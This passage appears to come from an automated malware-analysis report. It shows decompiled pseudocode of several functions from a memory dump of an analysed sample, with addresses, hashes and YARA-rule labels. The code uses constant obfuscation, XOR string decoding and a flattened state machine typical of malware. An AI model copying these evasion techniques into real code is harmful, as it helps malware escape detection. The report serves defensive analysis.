					E0024375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
				}
				return _v52;
			}



















                                                      0x002431f0
                                                      0x002431f3
                                                      0x002431fa
                                                      0x00243201
                                                      0x00243208
                                                      0x00243214
                                                      0x00243219
                                                      0x0024321e
                                                      0x00243225
                                                      0x0024322c
                                                      0x00243230
                                                      0x00243237
                                                      0x0024323e
                                                      0x00243245
                                                      0x0024324c
                                                      0x00243253
                                                      0x0024325a
                                                      0x00243261
                                                      0x00243264
                                                      0x0024326b
                                                      0x00243272
                                                      0x00243276
                                                      0x0024327d
                                                      0x00243281
                                                      0x00243288
                                                      0x0024328f
                                                      0x00243296
                                                      0x0024329d
                                                      0x002432a7
                                                      0x002432aa
                                                      0x002432b3
                                                      0x002432b7
                                                      0x002432be
                                                      0x002432c5
                                                      0x002432cc
                                                      0x002432d0
                                                      0x002432d7
                                                      0x002432de
                                                      0x002432e2
                                                      0x002432e9
                                                      0x002432f0
                                                      0x002432f7
                                                      0x002432fb
                                                      0x00243302
                                                      0x00243314
                                                      0x00243321
                                                      0x00243323
                                                      0x00243330
                                                      0x00243332
                                                      0x00243338
                                                      0x0024333e
                                                      0x00000000
                                                      0x00000000
                                                      0x00243340
                                                      0x00000000
                                                      0x0024333e
                                                      0x00243342
                                                      0x00243344
                                                      0x00243344
                                                      0x00243348
                                                      0x0024336d
                                                      0x00243372
                                                      0x0024337c

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `Zye$J5
                                                      • API String ID: 0-1569392922
                                                      • Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                                      • Instruction ID: 1c9c15c1694841710717b12a542b142c33d6dd68a98c02e9d6c7df59e5c885fe
                                                      • Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                                      • Instruction Fuzzy Hash: 274113B1C1021DEBEF59CFA1C94A9EEBBB5FB14304F108199E111B62A0D7B94B54CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0024889D, Relevance: 2.6, Strings: 2, Instructions: 101COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E0024889D(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t50;
				signed int _t57;
				signed int _t74;
				signed int _t75;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				signed int _t93;
				signed int _t94;
				signed int* _t95;
				signed int* _t96;
				signed int _t97;
				signed int _t98;
				unsigned int _t100;
				void* _t106;
				short _t107;
				void* _t108;
				void* _t109;

				_push( *((intOrPtr*)(_t108 + 0x30)));
				_push(__ecx);
				E0023602B(_t50);
				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
				_t95 =  &(__ecx[1]);
				_t107 = 0;
				 *((intOrPtr*)(_t108 + 0x34)) = 0;
				 *(_t108 + 0x24) = 0xc5f8;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
				 *(_t108 + 0x1c) = 0x21c8;
				_t97 = 0x48;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
				 *(_t108 + 0x20) = 0xf93e;
				_t98 = 0xe;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
				_t93 =  *__ecx;
				_t96 =  &(_t95[1]);
				_t57 =  *_t95 ^ _t93;
				 *(_t108 + 0x28) = _t93;
				 *(_t108 + 0x2c) = _t57;
				_t32 = _t57 + 1; // 0xf93f
				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
				_t109 = _t108 + 4;
				_t74 = E00238736(_t100 + _t100);
				 *(_t109 + 0x20) = _t74;
				if(_t74 != 0) {
					_t94 = _t74;
					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
					if(_t106 != 0) {
						_t75 =  *(_t109 + 0x1c);
						do {
							_t84 =  *_t96;
							_t96 =  &(_t96[1]);
							_t85 = _t84 ^ _t75;
							 *_t94 = _t85 & 0x000000ff;
							_t94 = _t94 + 8;
							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t106);
						_t74 =  *(_t109 + 0x18);
					}
					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
				}
				return _t74;
			}





















                                                      0x002488a4
                                                      0x002488a9
                                                      0x002488aa
                                                      0x002488af
                                                      0x002488b7
                                                      0x002488ba
                                                      0x002488be
                                                      0x002488c2
                                                      0x002488ca
                                                      0x002488d2
                                                      0x002488da
                                                      0x002488e8
                                                      0x002488ed
                                                      0x002488f1
                                                      0x002488f9
                                                      0x00248901
                                                      0x0024890f
                                                      0x00248912
                                                      0x00248916
                                                      0x0024891e
                                                      0x00248922
                                                      0x00248925
                                                      0x00248927
                                                      0x0024892b
                                                      0x0024892f
                                                      0x0024893f
                                                      0x0024894a
                                                      0x00248959
                                                      0x0024895b
                                                      0x00248963
                                                      0x0024896a
                                                      0x0024897b
                                                      0x00248980
                                                      0x00248982
                                                      0x00248986
                                                      0x00248986
                                                      0x00248988
                                                      0x0024898b
                                                      0x00248990
                                                      0x00248998
                                                      0x0024899e
                                                      0x002489a2
                                                      0x002489ab
                                                      0x002489ac
                                                      0x002489b3
                                                      0x002489b7
                                                      0x002489bb
                                                      0x002489bb
                                                      0x002489c5
                                                      0x002489c5
                                                      0x002489d2

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Q`${K
                                                      • API String ID: 0-3942002812
                                                      • Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                                      • Instruction ID: 22778ad60c91bb4fa69981675429a4a7ee11a7771355100465bfc311c33e4ae7
                                                      • Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                                      • Instruction Fuzzy Hash: AF31BB72A187128FD314DF29C48446BF7E0FF88318F414A2DE489A7250DB74E90A8B86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0024878F, Relevance: 2.6, Strings: 2, Instructions: 86COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E0024878F(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t40;
				signed int _t42;
				unsigned int* _t55;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int* _t70;
				signed int* _t71;
				signed int* _t72;
				unsigned int _t74;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;

				_push( *((intOrPtr*)(_t84 + 0x18)));
				_push( *(_t84 + 0x24));
				_push(__ecx);
				_t40 = E0023602B( *((intOrPtr*)(_t84 + 0x18)));
				 *(_t84 + 0x34) = 0x2399;
				_t4 =  &(_t40[1]); // 0x4
				_t71 = _t4;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
				 *(_t84 + 0x20) = 0xf668;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
				 *(_t84 + 0x1c) = 0x6aea;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
				_t58 =  *_t40;
				_t72 =  &(_t71[1]);
				_t42 =  *_t71 ^ _t58;
				 *(_t84 + 0x24) = _t58;
				 *(_t84 + 0x28) = _t42;
				_t23 = _t42 + 1; // 0x1
				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
				_t85 = _t84 + 8;
				_t55 = E00238736(_t74);
				 *(_t85 + 0x2c) = _t55;
				if(_t55 != 0) {
					_t82 = 0;
					_t70 = _t55;
					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
					if(_t80 != 0) {
						_t56 =  *(_t85 + 0x18);
						do {
							_t65 =  *_t72;
							_t72 =  &(_t72[1]);
							_t66 = _t65 ^ _t56;
							 *_t70 = _t66;
							_t70 =  &(_t70[1]);
							_t67 = _t66 >> 0x10;
							 *((char*)(_t70 - 3)) = _t66 >> 8;
							 *(_t70 - 2) = _t67;
							_t82 = _t82 + 1;
							 *((char*)(_t70 - 1)) = _t67 >> 8;
						} while (_t82 < _t80);
						_t55 =  *(_t85 + 0x28);
					}
					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
				}
				return _t55;
			}



















                                                      0x00248799
                                                      0x0024879a
                                                      0x0024879f
                                                      0x002487a0
                                                      0x002487a5
                                                      0x002487ad
                                                      0x002487ad
                                                      0x002487b0
                                                      0x002487b8
                                                      0x002487c0
                                                      0x002487c8
                                                      0x002487d0
                                                      0x002487d8
                                                      0x002487e0
                                                      0x002487e8
                                                      0x002487f0
                                                      0x002487f8
                                                      0x002487fc
                                                      0x002487ff
                                                      0x00248801
                                                      0x00248805
                                                      0x00248809
                                                      0x00248819
                                                      0x00248824
                                                      0x00248832
                                                      0x00248834
                                                      0x0024883c
                                                      0x00248844
                                                      0x00248846
                                                      0x00248857
                                                      0x0024885c
                                                      0x0024885e
                                                      0x00248862
                                                      0x00248862
                                                      0x00248864
                                                      0x00248867
                                                      0x00248869
                                                      0x00248870
                                                      0x00248873
                                                      0x00248876
                                                      0x00248879
                                                      0x0024887f
                                                      0x00248880
                                                      0x00248883
                                                      0x00248887
                                                      0x00248887
                                                      0x00248890
                                                      0x00248890
                                                      0x0024889c

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5Ur$j
                                                      • API String ID: 0-2435424154
                                                      • Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                                      • Instruction ID: 16e8732b170713eca28be14933234b49325343d7a04c270b12e534ebe0a762fb
                                                      • Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                                      • Instruction Fuzzy Hash: 30318D72A193018FD318CF29C88545BFBE0EF98714F454B5DF989A7251D734E90ACB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00249586, Relevance: 2.6, Strings: 2, Instructions: 79COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 64%
                                                      			E00249586(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr _t95;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x5b9444;
				_v12 = 0xdcba;
				_v12 = _v12 >> 4;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0x949;
				_v12 = _v12 ^ 0x00001af4;
				_v8 = 0x3cb;
				_v8 = _v8 + 0xffff192d;
				_v8 = _v8 + 0x1519;
				_v8 = _v8 ^ 0xffff4a83;
				_v20 = 0x60da;
				_v20 = _v20 >> 4;
				_t95 = _a4;
				_v20 = _v20 * 0x71;
				_v20 = _v20 ^ 0x0002f52e;
				_v24 = 0x45f5;
				_v24 = _v24 ^ 0x8ddfc3a3;
				_v24 = _v24 | 0x63507c9c;
				_v24 = _v24 ^ 0xefdfb5dc;
				_v32 = 0xfa49;
				_v32 = _v32 ^ 0xb8265659;
				_v32 = _v32 ^ 0xb826ab18;
				_v28 = 0xa34;
				_v28 = _v28 | 0x478cb459;
				_v28 = _v28 ^ 0x0d1ea304;
				_v28 = _v28 ^ 0x4a9200da;
				_v36 = 0x43f7;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00001d3e;
				_v16 = 0x9c5f;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x65dacbc4;
				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
				_t98 = _t78;
				if(_t78 != 0) {
					_push(0x24c860);
					_push(_v20);
					_t80 = E0024878F(_v12, _v8, _t98);
					_push(_v32);
					_t93 = _t80;
					_push(_v24);
					_t81 = E00246965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
					if(_t81 != 0) {
						 *_t81();
					}
					E00242025(_v28, _t93, _v36, _v16);
				}
				return 0;
			}

















                                                      0x0024958c
                                                      0x00249590
                                                      0x00249597
                                                      0x0024959e
                                                      0x002495a2
                                                      0x002495a6
                                                      0x002495ad
                                                      0x002495b4
                                                      0x002495bb
                                                      0x002495c2
                                                      0x002495cf
                                                      0x002495d6
                                                      0x002495dd
                                                      0x002495e6
                                                      0x002495ed
                                                      0x002495f0
                                                      0x002495f7
                                                      0x002495fe
                                                      0x00249605
                                                      0x0024960c
                                                      0x00249613
                                                      0x0024961a
                                                      0x00249621
                                                      0x00249628
                                                      0x0024962f
                                                      0x00249636
                                                      0x0024963d
                                                      0x00249644
                                                      0x0024964b
                                                      0x0024964f
                                                      0x00249656
                                                      0x00249661
                                                      0x00249668
                                                      0x0024966b
                                                      0x0024966f
                                                      0x00249679
                                                      0x0024967c
                                                      0x0024967e
                                                      0x00249681
                                                      0x00249686
                                                      0x0024968f
                                                      0x00249694
                                                      0x00249697
                                                      0x00249699
                                                      0x002496a1
                                                      0x002496ab
                                                      0x002496ad
                                                      0x002496ad
                                                      0x002496ba
                                                      0x002496c1
                                                      0x002496c8

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4$I
                                                      • API String ID: 0-2585635819
                                                      • Opcode ID: 8fd5369d6799bd54ecdbb129b27ccd2cbbd194491ded85fea06683789b4f38b4
                                                      • Instruction ID: 5162b11a00b8ca7b709bc65c3caaf85bca6e0c9328ec849e39eb9819e6616983
                                                      • Opcode Fuzzy Hash: 8fd5369d6799bd54ecdbb129b27ccd2cbbd194491ded85fea06683789b4f38b4
                                                      • Instruction Fuzzy Hash: 1C4112B1D0020AEBEF08DFA1C94A6EEBBB0FB44314F208159D411B6290D3B9AB55CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00237998, Relevance: 2.6, Strings: 2, Instructions: 74COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E00237998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t74;
				intOrPtr _t83;
				signed int _t85;
				signed int _t86;
				signed int _t96;
				intOrPtr* _t97;

				_t97 = _a4;
				_push(_a12);
				_t96 = _a8;
				_push(_t96);
				_push(_t97);
				E0023602B(_t74);
				_v24 = 0x43bd;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00002257;
				_v20 = 0xfb35;
				_v20 = _v20 ^ 0x316dcd7c;
				_v20 = _v20 ^ 0x316d5b09;
				_v8 = 0x86ca;
				_t85 = 0x26;
				_v8 = _v8 / _t85;
				_v8 = _v8 + 0xffffb56c;
				_v8 = _v8 ^ 0xffffa5a2;
				_a4 = 0x6ea8;
				_a4 = _a4 | 0xeb58ef4a;
				_a4 = _a4 << 6;
				_t86 = 0x7d;
				_a4 = _a4 / _t86;
				_a4 = _a4 ^ 0x01b6ec6f;
				_v16 = 0xf7ce;
				_v16 = _v16 + 0xffffb713;
				_v16 = _v16 + 0xe2af;
				_v16 = _v16 ^ 0x0001a1e1;
				_v12 = 0x7f90;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x9419cfce;
				_v12 = _v12 ^ 0x9419fbb9;
				_a8 = 0xab6f;
				_a8 = _a8 * 0x2a;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 | 0x38dd753e;
				_a8 = _a8 ^ 0x38dd1846;
				E0024360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
				E00242674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
				_t83 =  *((intOrPtr*)(_t97 + 4));
				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
				return _t83;
			}














                                                      0x0023799f
                                                      0x002379a3
                                                      0x002379a6
                                                      0x002379a9
                                                      0x002379aa
                                                      0x002379ad
                                                      0x002379b2
                                                      0x002379bb
                                                      0x002379bf
                                                      0x002379c6
                                                      0x002379cd
                                                      0x002379d4
                                                      0x002379db
                                                      0x002379e7
                                                      0x002379ec
                                                      0x002379f1
                                                      0x002379f8
                                                      0x002379ff
                                                      0x00237a06
                                                      0x00237a0d
                                                      0x00237a14
                                                      0x00237a19
                                                      0x00237a1c
                                                      0x00237a23
                                                      0x00237a2a
                                                      0x00237a31
                                                      0x00237a38
                                                      0x00237a3f
                                                      0x00237a46
                                                      0x00237a4a
                                                      0x00237a51
                                                      0x00237a58
                                                      0x00237a63
                                                      0x00237a66
                                                      0x00237a6a
                                                      0x00237a71
                                                      0x00237a84
                                                      0x00237a9d
                                                      0x00237aa2
                                                      0x00237aa8
                                                      0x00237ab0

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [m1$JX
                                                      • API String ID: 0-848362422
                                                      • Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                                      • Instruction ID: bfe028f06cca24ec59237103dad3180a3a3025ae38e566775aaca1ac43e469d8
                                                      • Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                                      • Instruction Fuzzy Hash: 8D310475900209FBCF58CFA5D94A89EBBB5FF44314F20C059E9196A260D3799B24DF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00239A37, Relevance: 1.6, Strings: 1, Instructions: 320COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E00239A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v196;
				void* _t297;
				signed int _t335;
				signed int* _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				char* _t354;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t386;

				_push(_a8);
				_t340 = __edx;
				_t380 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t297);
				_v24 = 0xc44;
				_t383 = _t382 + 0x10;
				_v24 = _v24 << 2;
				_v24 = _v24 << 5;
				_t381 = 0x108b8bb2;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x0003068b;
				_v96 = 0x3b9e;
				_v96 = _v96 ^ 0x893884c8;
				_v96 = _v96 ^ 0x89388972;
				_v48 = 0x8b0e;
				_v48 = _v48 << 6;
				_v48 = _v48 + 0xffffd606;
				_t342 = 0x6d;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x0e30afa5;
				_v76 = 0xbb1c;
				_v76 = _v76 + 0xffff2a80;
				_v76 = _v76 | 0x384e25df;
				_v76 = _v76 ^ 0xffffbccb;
				_v68 = 0x817b;
				_v68 = _v68 + 0xb36b;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x00761722;
				_v112 = 0x78f7;
				_v112 = _v112 + 0xabd9;
				_v112 = _v112 ^ 0x00010bcc;
				_v64 = 0xef7a;
				_v64 = _v64 * 0x6b;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0001bb5c;
				_v104 = 0x32c;
				_v104 = _v104 << 5;
				_v104 = _v104 ^ 0x00002d3d;
				_v52 = 0x7426;
				_v52 = _v52 * 0x5d;
				_v52 = _v52 ^ 0xa80e6da6;
				_v52 = _v52 / _t342;
				_v52 = _v52 ^ 0x018aaa04;
				_v12 = 0xd0fb;
				_t343 = 0x6a;
				_v12 = _v12 / _t343;
				_v12 = _v12 + 0xffff7920;
				_v12 = _v12 + 0xffff83ce;
				_v12 = _v12 ^ 0xfffec2a6;
				_v108 = 0xe89;
				_v108 = _v108 + 0x85a8;
				_v108 = _v108 ^ 0x0000adac;
				_v92 = 0xd004;
				_v92 = _v92 + 0xffff90ab;
				_v92 = _v92 | 0x2bfbb4c5;
				_v92 = _v92 ^ 0x2bfba16d;
				_v8 = 0x51d1;
				_v8 = _v8 ^ 0x91ec542a;
				_v8 = _v8 | 0xbd5d6296;
				_v8 = _v8 + 0xe80e;
				_v8 = _v8 ^ 0xbdfe1041;
				_v40 = 0xc5fc;
				_v40 = _v40 | 0x331e7523;
				_v40 = _v40 + 0xc476;
				_v40 = _v40 | 0xe5b13554;
				_v40 = _v40 ^ 0xf7bfa45a;
				_v116 = 0x6d98;
				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x000044aa;
				_v88 = 0x7357;
				_v88 = _v88 + 0x7cff;
				_t344 = 0x6e;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x0022e11b;
				_v56 = 0x39e0;
				_v56 = _v56 + 0xffffb0fb;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0xfffab6b2;
				_v44 = 0x2257;
				_v44 = _v44 / _t344;
				_v44 = _v44 + 0x17fe;
				_v44 = _v44 + 0xffff4b8e;
				_v44 = _v44 ^ 0xffff3a3c;
				_v16 = 0xac11;
				_t345 = 0xd;
				_v16 = _v16 / _t345;
				_t346 = 0x22;
				_v16 = _v16 / _t346;
				_v16 = _v16 + 0xffff8051;
				_v16 = _v16 ^ 0xffffec84;
				_v32 = 0x207e;
				_v32 = _v32 + 0xffff85d9;
				_v32 = _v32 | 0x92dc0f10;
				_t347 = 0x3d;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 ^ 0xffe76a4a;
				_v72 = 0xf5a4;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0x6505;
				_v72 = _v72 ^ 0x01ebcff4;
				_v124 = 0xf81;
				_v124 = _v124 + 0x174a;
				_v124 = _v124 ^ 0x00005562;
				_v80 = 0xd566;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xb30025af;
				_v20 = 0xd4e9;
				_v20 = _v20 ^ 0x0ea0d6e7;
				_v20 = _v20 / _t347;
				_v20 = _v20 | 0xf8279f10;
				_v20 = _v20 ^ 0xf83fc9b3;
				_v100 = 0xda9a;
				_v100 = _v100 * 3;
				_v100 = _v100 ^ 0x0002f5f9;
				_v36 = 0x78aa;
				_v36 = _v36 + 0x4117;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x25804fa7;
				_v36 = _v36 ^ 0x25803510;
				_v28 = 0x20d5;
				_v28 = _v28 + 0xfab3;
				_v28 = _v28 | 0xa4f7c20c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x149e8671;
				_v60 = 0x9445;
				_v60 = _v60 | 0xc2ce9f5c;
				_v60 = _v60 ^ 0x46e2878d;
				_v60 = _v60 ^ 0x842c5375;
				_v120 = 0x3512;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x006a5627;
				_v84 = 0xeb51;
				_v84 = _v84 * 0x42;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x000027de;
				goto L1;
				do {
					while(1) {
						L1:
						_t386 = _t381 - 0x1e9793a2;
						if(_t386 > 0) {
							break;
						}
						if(_t386 == 0) {
							E00237998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
							_t383 = _t383 + 0xc;
							_t381 = 0x39ecd3df;
							continue;
						} else {
							if(_t381 == 0xaa31e0c) {
								E00237998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
								_t383 = _t383 + 0xc;
								_t381 = 0x1e9793a2;
								continue;
							} else {
								if(_t381 == 0x108b8bb2) {
									 *_t340 =  *_t340 & 0x00000000;
									_t381 = 0x23e4e38d;
									_t340[1] = _t340[1] & 0x00000000;
									continue;
								} else {
									if(_t381 == 0x15969886) {
										_t354 =  &_v196;
										E0024360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
										_t383 = _t383 + 0xc;
										_t381 = 0x15fd630a;
										continue;
									} else {
										if(_t381 == 0x15fd630a) {
											_t354 =  &_v196;
											E0024360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
											_t383 = _t383 + 0xc;
											_t381 = 0x2ea6dd43;
											continue;
										} else {
											if(_t381 == 0x18d3ef4a) {
												_push(_t354);
												_t335 = E00238736(_t340[1]);
												 *_t340 = _t335;
												_t354 = _t354;
												__eflags = _t335;
												if(__eflags != 0) {
													_t381 = 0x22e1be53;
													continue;
												}
											} else {
												if(_t381 != 0x1a35bcc9) {
													goto L28;
												} else {
													_t354 =  &_v196;
													E0024360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
													_t383 = _t383 + 0xc;
													_t381 = 0xaa31e0c;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						__eflags =  *_t340;
						_t282 =  *_t340 != 0;
						__eflags = _t282;
						return 0 | _t282;
					}
					__eflags = _t381 - 0x22e1be53;
					if(_t381 == 0x22e1be53) {
						E002450F2( &_v196, _v76, _v68, _v112, _t340);
						_t383 = _t383 + 0xc;
						_t381 = 0x2d15c716;
						goto L28;
					} else {
						__eflags = _t381 - 0x23e4e38d;
						if(_t381 == 0x23e4e38d) {
							_t340[1] = E00247F1F(_t380);
							_t381 = 0x18d3ef4a;
							goto L1;
						} else {
							__eflags = _t381 - 0x2d15c716;
							if(__eflags == 0) {
								E00237998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
								_t383 = _t383 + 0xc;
								_t381 = 0x15969886;
								goto L1;
							} else {
								__eflags = _t381 - 0x2ea6dd43;
								if(_t381 == 0x2ea6dd43) {
									E0024360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
									_t383 = _t383 + 0xc;
									_t381 = 0x1a35bcc9;
									goto L1;
								} else {
									__eflags = _t381 - 0x39ecd3df;
									if(_t381 != 0x39ecd3df) {
										goto L28;
									} else {
										E0024360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
									}
								}
							}
						}
					}
					goto L23;
					L28:
					__eflags = _t381 - 0x1d48367e;
				} while (__eflags != 0);
				goto L23;
			}

















































                                                      0x00239a43
                                                      0x00239a46
                                                      0x00239a48
                                                      0x00239a4a
                                                      0x00239a4d
                                                      0x00239a4e
                                                      0x00239a4f
                                                      0x00239a54
                                                      0x00239a5b
                                                      0x00239a5e
                                                      0x00239a64
                                                      0x00239a68
                                                      0x00239a6d
